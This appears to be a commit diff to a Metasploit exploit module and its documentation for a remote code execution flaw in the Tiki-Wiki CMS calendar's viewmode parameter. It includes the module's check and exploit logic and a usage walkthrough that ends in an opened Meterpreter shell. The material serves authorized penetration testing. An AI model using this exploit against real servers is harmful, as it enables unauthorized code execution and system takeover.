Update tiki_calendar_exec module and documentation

Author: wchen-r7

documentation/modules/exploit/linux/http/tiki_calendar_exec.md

@@ -1,20 +1,19 @@
 ## Vulnerable Application
 
-  Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
-  Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
-  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+  * Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
+  * Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
+  * Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+
+  **Of note, there is some discussion if 14.2 is vuln or not.**
 
-  Of note, there is some discussion if 14.2 is vuln or not.
-```
   1. Exploit-DB says in the title (may be wrong) 14.2 is vuln.
   2. The linked app Exploit-DB has is 14.2.
   3. Its verified on Exploit-DB.
-```
+
 vs
-```
+
   1. Manual print statement testing from the PoC on 14.2 doesn't seem to be vuln
   2. The [notice](https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki) seems to say 14.2 is the update that fixes the problem
-```
 
 ### Creating A Testing Environment
 
@@ -29,7 +28,8 @@ vs
 
 #### Permissions
 
-  If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar
+  If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar:
+
   1. Log in as admin
   2. From the top dropdown select permissions
   3. Check Anonymous near the top
@@ -45,13 +45,16 @@ vs
   6. Do: `set payload php/bind_perl`
   7. Do: `set verbose true`
   8. Do: `check`
+
 ```
   [*] Attempting Login
   [+] Login Successful!
   [+] 10.10.10.10:80 The target is vulnerable.
 ```
-  8. Do: `exploit`
-  9. You should get a shell
+
+  9. Do: `exploit`
+  10. You should get a shell
+
 ```
   [*] Started reverse TCP handler on 10.10.10.10:4444 
   [*] Attempting Login
@@ -60,6 +63,7 @@ vs
   [*] Sending stage (33721 bytes) 10.10.10.10.190
   [*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400
 ```
+
 ## Options
 
   **PASSWORD**

modules/exploits/linux/http/tiki_calendar_exec.rb

@@ -6,9 +6,11 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
-  include Msf::Exploit::Remote::HttpClient
 
   Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
   def initialize(info = {})
     super(
       update_info(
@@ -17,9 +19,10 @@ def initialize(info = {})
         'Description' => %q(
           Tiki-Wiki CMS's calendar module contains a remote code execution
           vulnerability within the viewmode GET parameter.
-          The calendar module is NOT enabled by default.  When enbled,
+          The calendar module is NOT enabled by default.  If enabled,
           the default permissions are set to NOT allow anonymous users
           to access.
+
           Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14
           Verified/Tested against 14.1
         ),
@@ -118,10 +121,12 @@ def check
     if datastore['USERNAME'] && !datastore['USERNAME'].blank?
       cookie = authenticate
     end
+
     flag = Rex::Text.rand_text_alpha(10)
     res = send_calendar_packet(cookie, "print(#{flag})")
+
     if res
-      if res.body =~ /You do not have permission to view the calendar/
+      if res.body =~ /You do not have permission to view the calendar/i
         fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
       elsif res.body =~ />#{flag}</
         Exploit::CheckCode::Vulnerable
@@ -135,10 +140,12 @@ def exploit
     if datastore['USERNAME'] && !datastore['USERNAME'].blank?
       cookie = authenticate
     end
+
     vprint_status('Sending malicious calendar view packet')
     res = send_calendar_packet(cookie, payload.encoded)
-    if res && res.body =~ /You do not have permission to view the calendar/
+    if res && res.body =~ /You do not have permission to view the calendar/i
       fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
     end
   end
+
 end